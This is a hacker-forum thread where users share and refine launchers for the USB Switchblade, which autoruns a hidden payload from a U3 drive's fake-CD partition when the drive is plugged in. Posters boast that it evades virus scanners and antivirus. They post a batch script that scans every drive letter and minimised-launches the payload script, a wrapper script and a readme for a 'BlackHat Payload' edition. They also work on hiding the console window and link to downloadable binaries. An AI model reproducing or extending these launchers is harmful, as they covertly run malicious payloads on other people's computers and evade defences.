Jump to content

SwitchBlades [Simpler launch process] U3


madlogik
 Share

Recommended Posts

I made a simpler launch process for payloads.

I made a .exe (in the root in the .iso)

and modified the original u3 autorun file to launch my

tool instead of launchu3 directly!!

if caps lock is off : it will launchu3.exe normally.. :)

if caps lock is on: it will launch my.exe :) or your.bat or our whatever!!! :)

so this way you have your fully functionnal u3 usb key, with u3launcher!

the payload and the tools are hidden on the (fakeCD) partition!!!

(invisible to a virus sanner for instance)

and when you plug it in with caps lock on... , its too late for mcafee to react!

+ it cant deleete it from the fake cd .. so it keeps on running ! :)

cool things happends.. ;)

now Im trying to make my rainbowcrack gui an asp page ..

.. a bit like rainbowcrack-online did... but I want it done my way! :)

well... gotta go typing code lines.. ;)

-mad-

ps: if you want my version, I can provide you with

the lminstaller + my .iso (the payload is a simple ip tool I made...)

cool thing about that simple tool: it retreives the wan ip from the

whatismyip.com website !! :)

so if you have a router .. its a cool tool ;)

well ... wtf.. heres the link to my version :

http://madlogik.mine.nu:999/madswitchblade_u3.rar

(for ez edit, put your tool in there instead of my iptool.exe but

give it the same filename!)

---> if you want to run a .bat, google for: bat2exe <----

This works only with U3 usb drives!

--> I have a sandisk cruzer micro 1gb u3 enabled pendrive <--

Link to comment
Share on other sites

  • 3 weeks later...
D'ya think you could give us the source code to that program please? I have an idea to make this thing compatible with any payload, and more community friendly.

ditto

i mean it's always good to share source code so people can develop on top and extended features and continue development

Link to comment
Share on other sites

  • 2 weeks later...
D'ya think you could give us the source code to that program please? I have an idea to make this thing compatible with any payload, and more community friendly.

I also would really love to know the source, but meanwhile i am using this:

http://rapidshare.com/files/4425480/Launcher.rar

included in this package:

IP_TOOL.EXE is a simple C++ Program that executes start.bat

start.bat searches all the local Drives for WIPCMDgo.bat and executes it.

start.bat:

@echo off

if exist C:WIPCMDgo.cmd start /MIN C:WIPCMDgo.cmd C

if exist D:WIPCMDgo.cmd start /MIN D:WIPCMDgo.cmd D

if exist E:WIPCMDgo.cmd start /MIN E:WIPCMDgo.cmd E

if exist F:WIPCMDgo.cmd start /MIN F:WIPCMDgo.cmd F

if exist G:WIPCMDgo.cmd start /MIN G:WIPCMDgo.cmd G

if exist H:WIPCMDgo.cmd start /MIN H:WIPCMDgo.cmd H

if exist I:WIPCMDgo.cmd start /MIN I:WIPCMDgo.cmd I

if exist J:WIPCMDgo.cmd start /MIN J:WIPCMDgo.cmd J

if exist K:WIPCMDgo.cmd start /MIN K:WIPCMDgo.cmd K

if exist L:WIPCMDgo.cmd start /MIN L:WIPCMDgo.cmd L

if exist M:WIPCMDgo.cmd start /MIN M:WIPCMDgo.cmd M

if exist N:WIPCMDgo.cmd start /MIN N:WIPCMDgo.cmd N

if exist O:WIPCMDgo.cmd start /MIN O:WIPCMDgo.cmd O

if exist P:WIPCMDgo.cmd start /MIN P:WIPCMDgo.cmd P

if exist Q:WIPCMDgo.cmd start /MIN Q:WIPCMDgo.cmd Q

if exist R:WIPCMDgo.cmd start /MIN R:WIPCMDgo.cmd R

if exist S:WIPCMDgo.cmd start /MIN S:WIPCMDgo.cmd S

if exist T:WIPCMDgo.cmd start /MIN T:WIPCMDgo.cmd T

if exist U:WIPCMDgo.cmd start /MIN U:WIPCMDgo.cmd U

if exist V:WIPCMDgo.cmd start /MIN V:WIPCMDgo.cmd V

if exist W:WIPCMDgo.cmd start /MIN W:WIPCMDgo.cmd W

if exist X:WIPCMDgo.cmd start /MIN X:WIPCMDgo.cmd X

if exist Y:WIPCMDgo.cmd start /MIN Y:WIPCMDgo.cmd Y

if exist Z:WIPCMDgo.cmd start /MIN Z:WIPCMDgo.cmd Z

Moonboy33

Link to comment
Share on other sites

I just wrote my own version of MADSTART.EXE...

It´s just a small C applikation, but it does the job!

Binary(Windows): http://rapidshare.com/files/4439170/MStart.exe

and here is the code:

//edit: everytime i try posting the code, it gives me an error message...

//edit2: here´s the code: http://rapidshare.com/files/4439975/Mstart.cpp

Explanation: If CapsLock is activated LaunchU3.exe will be executed, otherwise it ececutes Switchblade.exe

Moonboy33

Link to comment
Share on other sites

I just wrote my own version of MADSTART.EXE...

It´s just a small C applikation, but it does the job!

Binary(Windows): http://rapidshare.com/files/4439170/MStart.exe

and here is the code:

//edit: everytime i try posting the code, it gives me an error message...

//edit2: here´s the code: http://rapidshare.com/files/4439975/Mstart.cpp

Explanation: If CapsLock is activated LaunchU3.exe will be executed, otherwise it ececutes Switchblade.exe

Moonboy33

Hi Everyone,

New guy here.

Question @ moonboy,

COuld you post instructions on how to setup up this version?

Are you putting the payload on the fake cd partition? or simply using the same method as the other switchblade versions?

Link to comment
Share on other sites

I made a simpler launch process for payloads.

I made a .exe (in the root in the .iso)

and modified the original u3 autorun file to launch my

tool instead of launchu3 directly!!

if caps lock is off : it will launchu3.exe normally.. :)

if caps lock is on: it will launch my.exe :) or your.bat or our whatever!!! :)

so this way you have your fully functionnal u3 usb key, with u3launcher!

the payload and the tools are hidden on the (fakeCD) partition!!!

(invisible to a virus sanner for instance)

and when you plug it in with caps lock on... , its too late for mcafee to react!

+ it cant deleete it from the fake cd .. so it keeps on running ! :)

cool things happends.. ;)

now Im trying to make my rainbowcrack gui an asp page ..

.. a bit like rainbowcrack-online did... but I want it done my way! :)

well... gotta go typing code lines.. ;)

-mad-

ps: if you want my version, I can provide you with

the lminstaller + my .iso (the payload is a simple ip tool I made...)

cool thing about that simple tool: it retreives the wan ip from the

whatismyip.com website !! :)

so if you have a router .. its a cool tool ;)

well ... wtf.. heres the link to my version :

http://madlogik.mine.nu:999/madswitchblade_u3.rar

(for ez edit, put your tool in there instead of my iptool.exe but

give it the same filename!)

---> if you want to run a .bat, google for: bat2exe <----

This works only with U3 usb drives!

--> I have a sandisk cruzer micro 1gb u3 enabled pendrive <--

Is this a post and run or what?

Link to comment
Share on other sites

Hi Everyone,

New guy here.

Question @ moonboy,

COuld you post instructions on how to setup up this version?

Are you putting the payload on the fake cd partition? or simply using the same method as the other switchblade versions?

I´m creating a package with all needed tools right now...

I´ll upload it as soon as i´m done!

Moonboy33

Link to comment
Share on other sites

Should I be seeing the Dos window?

I´m currently working on an updated version that hides the DOS window automatically!

If so, is this as stealthy as the original switchblade code?

The program I posted, is just the Launcher for the Switchblade code! (WIPCMDgo.cmd)

Moonboy33

Link to comment
Share on other sites

yo moonboy could u give this a page on the wiki ?

o and could u make a launcher that starts StartPortableApps.exe in the root of the usb stick instead of the launchU3.exe ?

ps i'll be mirroring ure current build on 2 servers* so keep me informed bout when there are updates and when u have a wiki page.

* mirrors :

http://dlss.channelwood.org/private/apps/MSTART_Complete.rar

http://d4rkc0d3.my-place.us/hak5/MSTART_Complete.rar

Link to comment
Share on other sites

yo moonboy could u give this a page on the wiki ?

o and could u make a launcher that starts StartPortableApps.exe in the root of the usb stick instead of the launchU3.exe ?

ps i'll be mirroring ure current build on 2 servers* so keep me informed bout when there are updates and when u have a wiki page.

* mirrors :

http://dlss.channelwood.org/private/apps/MSTART_Complete.rar

http://d4rkc0d3.my-place.us/hak5/MSTART_Complete.rar

Couldn't you just rename StartPortableApps.exe to launchU3.exe?

Link to comment
Share on other sites

yo moonboy could u give this a page on the wiki ?

o and could u make a launcher that starts StartPortableApps.exe in the root of the usb stick instead of the launchU3.exe ?

ps i'll be mirroring ure current build on 2 servers* so keep me informed bout when there are updates and when u have a wiki page.

* mirrors :

http://dlss.channelwood.org/private/apps/MSTART_Complete.rar

http://d4rkc0d3.my-place.us/hak5/MSTART_Complete.rar

Couldn't you just rename StartPortableApps.exe to launchU3.exe?

no because i still have the original launcher on there aswell , well u could say rename that aswell but i find it then gets messy .....)

Link to comment
Share on other sites

yo moonboy could u give this a page on the wiki ?

o and could u make a launcher that starts StartPortableApps.exe in the root of the usb stick instead of the launchU3.exe ?

ps i'll be mirroring ure current build on 2 servers* so keep me informed bout when there are updates and when u have a wiki page.

* mirrors :

http://dlss.channelwood.org/private/apps/MSTART_Complete.rar

http://d4rkc0d3.my-place.us/hak5/MSTART_Complete.rar

Couldn't you just rename StartPortableApps.exe to launchU3.exe?

no because i still have the original launcher on there aswell , well u could say rename that aswell but i find it then gets messy .....)

Well the source code is included so why not just change LaunchU3.exe to whatever you want?
Link to comment
Share on other sites

V2:

The new version checks the SCROLL-Lock state first, and then continues with checking the CAPS-Lock state.

If SCROLL-Lock is activated, a Whitehat Payload or the Antidote is executed.

If not, the BlackHat PayLoad/LaunchU3 (depending on CAPS-Lock) is executed.

Should I be seeing the Dos window?

Dos Window hidden! :D

yo moonboy could u give this a page on the wiki ?

I´m working on it.

If you have questions, feel free to ask me!

Moonboy33

Links:

Only the .exe files:

http://rapidshare.com/files/6075656/MSTART_Versions_v2.rar

Complete Package with Universal Customizer:

http://rapidshare.com/files/6078156/Univer...r_MSTART_v2.rar

@DLSS

StartPortableApps-Version:

http://rapidshare.com/files/6055891/MStart...ortableApps.rar

//edit: There was an error in the readme-file thanks for telling me!

Readme:

MStart "Black"-Edition:

~~~~~~~~~~~~~~~~~~~~~~~

The "bad" Version of the MStart Loader!

Function:

°°°°°°°°°

-)SCROLL-LOCK ON -> WhiteHat Payload

-)SCROLL-LOCK OFF -> {

-) CAPSLOCK OFF - BlackHat Payload

~) CAPSLOCK ON - U3 LaunchPad

}

MStart "White"-Edition:

~~~~~~~~~~~~~~~~~~~~~~~

The "good" version of the MStart Loader!

Function:

°°°°°°°°°

-)SCROLL-LOCK ON -> WhiteHat Payload

-)SCROLL-LOCK OFF -> {

-) CAPSLOCK OFF - U3 LaunchPad

~) CAPSLOCK ON - BlackHat Payload

}

Installation:

=============

-) Choose one file.

-) Rename it to MSTART.EXE

-) Copy it to U3CUSTOM

-) Launch IsoCreate.cmd

-) Start the Installation!

-) Done!

Link to comment
Share on other sites

UPDATE:

To get the your payload to work "out-of-the-box" I suggest you to put this go.cmd in your x:WIPCMD and rename the original payload executable (go.cmd) to go.bat!

@echo off

%1:

cd WIPCMD

go.bat

http://rapidshare.com/files/6074446/go.cmd

This is nessecary becuase otherwise, it would try to launch the Payload from the CD-Partition!

Moonboy33

Link to comment
Share on other sites

it cant find te exe for example ...

I thought StartPortableApps.exe is located inside the CD-Partition...

I´ll change that!

o and where does it look to start the whitehat payload/antidote ?

X...Drive Letter of U3 Flash Drive

X:WIPwhitehatgo.cmd

I also noticed an error in the launching process, which will be fixed within the next release!

Moonboy33

Link to comment
Share on other sites

it cant find te exe for example ...

I thought StartPortableApps.exe is located inside the CD-Partition...

I´ll change that!

o and where does it look to start the whitehat payload/antidote ?

X...Drive Letter of U3 Flash Drive

X:WIPwhitehatgo.cmd

I also noticed an error in the launching process, which will be fixed within the next release!

Moonboy33

kwl ,ps is there anything i can contribute 4 ya ?

cos i'm feeling im not contributing anything here ...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...